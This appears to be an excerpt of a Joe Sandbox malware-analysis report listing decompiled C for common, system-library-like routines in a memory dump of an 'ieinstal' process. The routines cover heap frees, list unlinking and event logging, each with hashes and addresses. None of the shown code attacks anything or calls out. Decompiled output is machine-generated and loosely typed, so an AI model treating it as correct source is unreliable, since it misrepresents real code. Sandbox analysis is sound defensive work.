                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 048b0546821c3179078ed70730900b532dc8eac69be9c77a33ed50e3e1e02950
                                                            • Instruction ID: cf30f58c4573d3f7e724de644ece6604bd3391454d1c7a395dccbfdc3e074b4d
                                                            • Opcode Fuzzy Hash: 048b0546821c3179078ed70730900b532dc8eac69be9c77a33ed50e3e1e02950
                                                            • Instruction Fuzzy Hash: 3221CF729003899BC301DF69DD44B9BB7EDBF85644F010A56EA4087250EB35E94CC6E2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED2070D Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E1ED2070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E1ED207DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E1ED1AFDE( &_v8,  &_v12);
					E1ED21293(_t38, _v28, _t60);
					if(E1EC77D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E1ED114FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                            0x1ed2071b
                                                            0x1ed20724
                                                            0x1ed20734
                                                            0x1ed20738
                                                            0x1ed2074b
                                                            0x1ed2074b
                                                            0x1ed20753
                                                            0x1ed20753
                                                            0x1ed20759
                                                            0x1ed2075d
                                                            0x1ed20774
                                                            0x1ed20779
                                                            0x1ed2077d
                                                            0x1ed20789
                                                            0x1ed20795
                                                            0x1ed207a7
                                                            0x1ed20797
                                                            0x1ed207a0
                                                            0x1ed207a0
                                                            0x1ed207af
                                                            0x1ed207c4
                                                            0x1ed207cd
                                                            0x1ed207cd
                                                            0x1ed207af
                                                            0x1ed207dc

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                            • Instruction ID: e0785c1edaa75d93844811eadf4f2d5dd17f28755eeec8c78129a3eb2aa5c105
                                                            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                            • Instruction Fuzzy Hash: 0421043A6042459FDB01CF28C890B6ABBE6EFD4754F048679F9958B381DB30E909CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC7AE73 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 96%
                                                            			E1EC7AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E1EC77D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E1EC77D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E1EC77D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E1EC77D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E1ECD7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                            0x1ec7ae78
                                                            0x1ec7ae7c
                                                            0x1ec7ae7e
                                                            0x1ec7ae81
                                                            0x1ec7ae86
                                                            0x1ec7ae8d
                                                            0x1ecc2691
                                                            0x1ec7ae93
                                                            0x1ec7ae93
                                                            0x1ec7ae93
                                                            0x1ec7ae98
                                                            0x1ec7ae9d
                                                            0x1ecc26a2
                                                            0x1ecc26b4
                                                            0x1ecc26a4
                                                            0x1ecc26ad
                                                            0x1ecc26ad
                                                            0x1ecc26b9
                                                            0x00000000
                                                            0x1ecc26bb
                                                            0x00000000
                                                            0x1ecc26bb
                                                            0x1ec7aea3
                                                            0x1ec7aea3
                                                            0x1ec7aea3
                                                            0x1ec7aeaa
                                                            0x1ecc26c0
                                                            0x1ecc26c9
                                                            0x1ecc26c9
                                                            0x1ec7aeb3
                                                            0x1ecc26d4
                                                            0x1ecc26e1
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc26e7
                                                            0x1ecc26ee
                                                            0x1ecc26f0
                                                            0x1ecc26f9
                                                            0x1ecc26f9
                                                            0x1ecc2702
                                                            0x1ecc2708
                                                            0x1ecc2708
                                                            0x1ecc270b
                                                            0x1ecc270f
                                                            0x1ecc2711
                                                            0x1ecc2711
                                                            0x1ecc2725
                                                            0x1ecc2725
                                                            0x00000000
                                                            0x1ec7aeb9
                                                            0x1ec7aeb9
                                                            0x1ec7aebf
                                                            0x1ec7aebf
                                                            0x1ec7aeb3

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                            • Instruction ID: 61cb3f185ff610631f99bd253d74cae4375f35871f17088a46272be1a81fc87c
                                                            • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                            • Instruction Fuzzy Hash: C821F932A01AC59FD7058B6ACD54B1977E6EF44750F0506A0ED088B795EB74DC50C7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECD7794 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			E1ECD7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1ed47b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L1EC74620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E1EC9F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E1EC77D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E1EC99AE0();
					_t24 = L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                            0x1ecd7799
                                                            0x1ecd779a
                                                            0x1ecd779b
                                                            0x1ecd77a3
                                                            0x1ecd77ab
                                                            0x1ecd77ae
                                                            0x1ecd77b1
                                                            0x1ecd77b1
                                                            0x1ecd77bf
                                                            0x1ecd77c4
                                                            0x1ecd77c8
                                                            0x1ecd77ce
                                                            0x1ecd77d4
                                                            0x1ecd77e0
                                                            0x1ecd77e0
                                                            0x1ecd77d6
                                                            0x1ecd77d6
                                                            0x1ecd77de
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecd77de
                                                            0x1ecd77e5
                                                            0x1ecd77f0
                                                            0x1ecd77f3
                                                            0x1ecd77f6
                                                            0x1ecd77fd
                                                            0x1ecd7800
                                                            0x1ecd780c
                                                            0x1ecd7818
                                                            0x1ecd782b
                                                            0x1ecd781a
                                                            0x1ecd7823
                                                            0x1ecd7823
                                                            0x1ecd7830
                                                            0x1ecd7831
                                                            0x1ecd7838
                                                            0x1ecd783d
                                                            0x1ecd783e
                                                            0x1ecd784f
                                                            0x1ecd784f
                                                            0x1ecd785a

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 342fefcdafec88e24a8ff8ab823d093e791ec44011defe9d65e8a6b56a418faf
                                                            • Instruction ID: e28821abd5d6f86fc443d88f8d484957d4319e6dd037a9034a281e061ef14e5c
                                                            • Opcode Fuzzy Hash: 342fefcdafec88e24a8ff8ab823d093e791ec44011defe9d65e8a6b56a418faf
                                                            • Instruction Fuzzy Hash: C1219D76900784ABC715CF69DC90EABB7A9FF48340F104A69E60AD7750EB35E904CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC8FD9B Relevance: .1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E1EC8FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E1EC676E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L1EC74620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                            0x1ec8fd9b
                                                            0x1ec8fda0
                                                            0x1ec8fda1
                                                            0x1ec8fdab
                                                            0x1ec8fdad
                                                            0x1ec8fdb0
                                                            0x1ec8fdb8
                                                            0x1ec8fe0f
                                                            0x1ec8fde6
                                                            0x1ec8fde9
                                                            0x1ec8fdec
                                                            0x1eccc0c0
                                                            0x1ec8fdfe
                                                            0x1ec8fe06
                                                            0x1ec8fe06
                                                            0x1eccc0c8
                                                            0x1ec8fe2d
                                                            0x1ec8fe2d
                                                            0x00000000
                                                            0x1ec8fe2d
                                                            0x1eccc0d1
                                                            0x1eccc0e0
                                                            0x1eccc0e5
                                                            0x1eccc0e5
                                                            0x1eccc0e8
                                                            0x00000000
                                                            0x1eccc0e8
                                                            0x1ec8fdf4
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec8fdf6
                                                            0x1ec8fdfa
                                                            0x1ec8fe1a
                                                            0x1ec8fe1f
                                                            0x1ec8fe1f
                                                            0x1ec8fdfc
                                                            0x00000000
                                                            0x1ec8fdfc
                                                            0x1ec8fdcc
                                                            0x1ec8fdd0
                                                            0x1ec8fe26
                                                            0x00000000
                                                            0x1ec8fe26
                                                            0x1ec8fdd8
                                                            0x1ec8fddb
                                                            0x1ec8fddd
                                                            0x1ec8fde0
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                            • Instruction ID: d6d3b541f8bdf7435335229dae58243f2224d3864ab578004a901b9ce0bfa4e5
                                                            • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                            • Instruction Fuzzy Hash: 2D21807260068ADFD325CF0ACA50E56B7E6FB94B15F21867EEA4487718D730AC41CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC59240 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E1EC59240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x1ed2f708);
				E1ECAD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E1EC995D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E1EC995D0();
				_t33 =  *0x1ed484c4; // 0x0
				L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x1ed484c4; // 0x0
				L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x1ed484c4; // 0x0
				E1EC72280(L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x1ed486b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E1EC995D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E1EC995D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E1EC59325();
					_t50 =  *0x1ed484c4; // 0x0
					return E1ECAD0D1(L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                            0x1ec59240
                                                            0x1ec59242
                                                            0x1ec59247
                                                            0x1ec5924c
                                                            0x1ec5924e
                                                            0x1ec59255
                                                            0x1ec59257
                                                            0x1ec5925a
                                                            0x1ec5925f
                                                            0x1ec5925f
                                                            0x1ec59266
                                                            0x1ec59271
                                                            0x1ec59276
                                                            0x1ec59279
                                                            0x1ec5927e
                                                            0x1ec59295
                                                            0x1ec5929a
                                                            0x1ec592b1
                                                            0x1ec592b6
                                                            0x1ec592d7
                                                            0x1ec592dc
                                                            0x1ec592e0
                                                            0x1ec592e6
                                                            0x1ec592e8
                                                            0x1ec592ee
                                                            0x1ec59332
                                                            0x1ec59333
                                                            0x1ec59337
                                                            0x1ec59338
                                                            0x1ec5933a
                                                            0x1ec5933a
                                                            0x1ec5933d
                                                            0x1ec59342
                                                            0x1ec59342
                                                            0x1ec59345
                                                            0x1ec59349
                                                            0x1ec5934e
                                                            0x1ec59352
                                                            0x1ec59357
                                                            0x1ec592f4
                                                            0x1ec592f4
                                                            0x1ec592f6
                                                            0x1ec592f9
                                                            0x1ec59300
                                                            0x1ec59306
                                                            0x1ec59324
                                                            0x1ec59324

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5efb60b5ff025db8e95882138cbac4c942d8ef7358c8519e6df7d4772cfc4791
                                                            • Instruction ID: da927a9921e5a33318d689810a96d4d2a1b627a27da1df845b334eea6bab1c77
                                                            • Opcode Fuzzy Hash: 5efb60b5ff025db8e95882138cbac4c942d8ef7358c8519e6df7d4772cfc4791
                                                            • Instruction Fuzzy Hash: 60215936540681DFC722DF28CE40F8AB7BAFF18305F154AA8E15987BA1CB34E942CB44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC8B390 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 54%
                                                            			E1EC8B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E1EC72280(_t12, 0x1ed48608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E1EC900C2(0x1ed48608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                            0x1ec8b395
                                                            0x1ec8b3a2
                                                            0x1ec8b3a5
                                                            0x1ec8b3aa
                                                            0x1ec8b3b2
                                                            0x1ec8b3ba
                                                            0x1ec8b3bd
                                                            0x1ec8b3c0
                                                            0x1ec8b3c4
                                                            0x1ec8b3c9
                                                            0x1ecca3e9
                                                            0x1ecca3ed
                                                            0x1ecca3f0
                                                            0x1ecca3ff
                                                            0x1ecca403
                                                            0x1ecca409
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecca40b
                                                            0x1ecca40b
                                                            0x1ecca40f
                                                            0x1ecca415
                                                            0x1ecca423
                                                            0x1ecca423
                                                            0x1ecca415
                                                            0x1ec8b3d1
                                                            0x1ec8b3e8
                                                            0x1ec8b3e8
                                                            0x1ec8b3d9

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 517bf5d6f17075523c5a5c028b2d34bf7d377268a9f5d3251ba3206545a1af5c
                                                            • Instruction ID: 81740465ab265eca70ec1183b364d5de93e2e02017b53fcde01b2d261032eddf
                                                            • Opcode Fuzzy Hash: 517bf5d6f17075523c5a5c028b2d34bf7d377268a9f5d3251ba3206545a1af5c
                                                            • Instruction Fuzzy Hash: 4F11663B7111509BC719CA1ADE82A5BB297EBD6770B390329ED1BC7780CE31AC02C790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECE4257 Relevance: .1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 90%
                                                            			E1ECE4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x1ed308d0);
				E1ECAD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E1ECE41E8(__ebx, __edi, __ecx, _t39);
				E1EC6EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x1ed487e4;
					_t18 =  *0x1ed487e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1ed45cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x1ed487e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x1ed487e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L1EC57055(_t31 + 0xfffffff8);
								_t24 =  *0x1ed487e0; // 0x0
								_t18 = _t24 - 1;
								 *0x1ed487e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1ed45cd0;
				if( *0x1ed45cd0 <= 0) {
					L1EC57055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x1ed487e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x1ed487e8 = _t30;
						 *0x1ed487e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E1ECAD0D1(L1ECE4320());
			}















                                                            0x1ece4257
                                                            0x1ece4257
                                                            0x1ece4257
                                                            0x1ece4259
                                                            0x1ece425e
                                                            0x1ece4263
                                                            0x1ece4265
                                                            0x1ece4273
                                                            0x1ece4278
                                                            0x1ece427c
                                                            0x1ece427f
                                                            0x1ece4281
                                                            0x1ece4287
                                                            0x1ece42d7
                                                            0x1ece42d7
                                                            0x1ece42da
                                                            0x1ece428d
                                                            0x1ece428d
                                                            0x1ece428f
                                                            0x1ece4292
                                                            0x1ece4297
                                                            0x1ece429c
                                                            0x1ece42a0
                                                            0x1ece42a6
                                                            0x1ece42a8
                                                            0x1ece42ae
                                                            0x1ece42b3
                                                            0x00000000
                                                            0x1ece42ba
                                                            0x1ece42ba
                                                            0x1ece42bf
                                                            0x1ece42c5
                                                            0x1ece42ca
                                                            0x1ece42cf
                                                            0x1ece42d0
                                                            0x00000000
                                                            0x1ece42d0
                                                            0x1ece42b3
                                                            0x00000000
                                                            0x1ece42a6
                                                            0x1ece429c
                                                            0x1ece42dc
                                                            0x1ece42dc
                                                            0x1ece42e3
                                                            0x1ece4309
                                                            0x1ece42e5
                                                            0x1ece42e5
                                                            0x1ece42e8
                                                            0x1ece42ee
                                                            0x1ece42f0
                                                            0x00000000
                                                            0x1ece42f2
                                                            0x1ece42f2
                                                            0x1ece42f4
                                                            0x1ece42f7
                                                            0x1ece42f9
                                                            0x1ece4300
                                                            0x1ece4300
                                                            0x1ece42f0
                                                            0x1ece430e
                                                            0x1ece431f

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
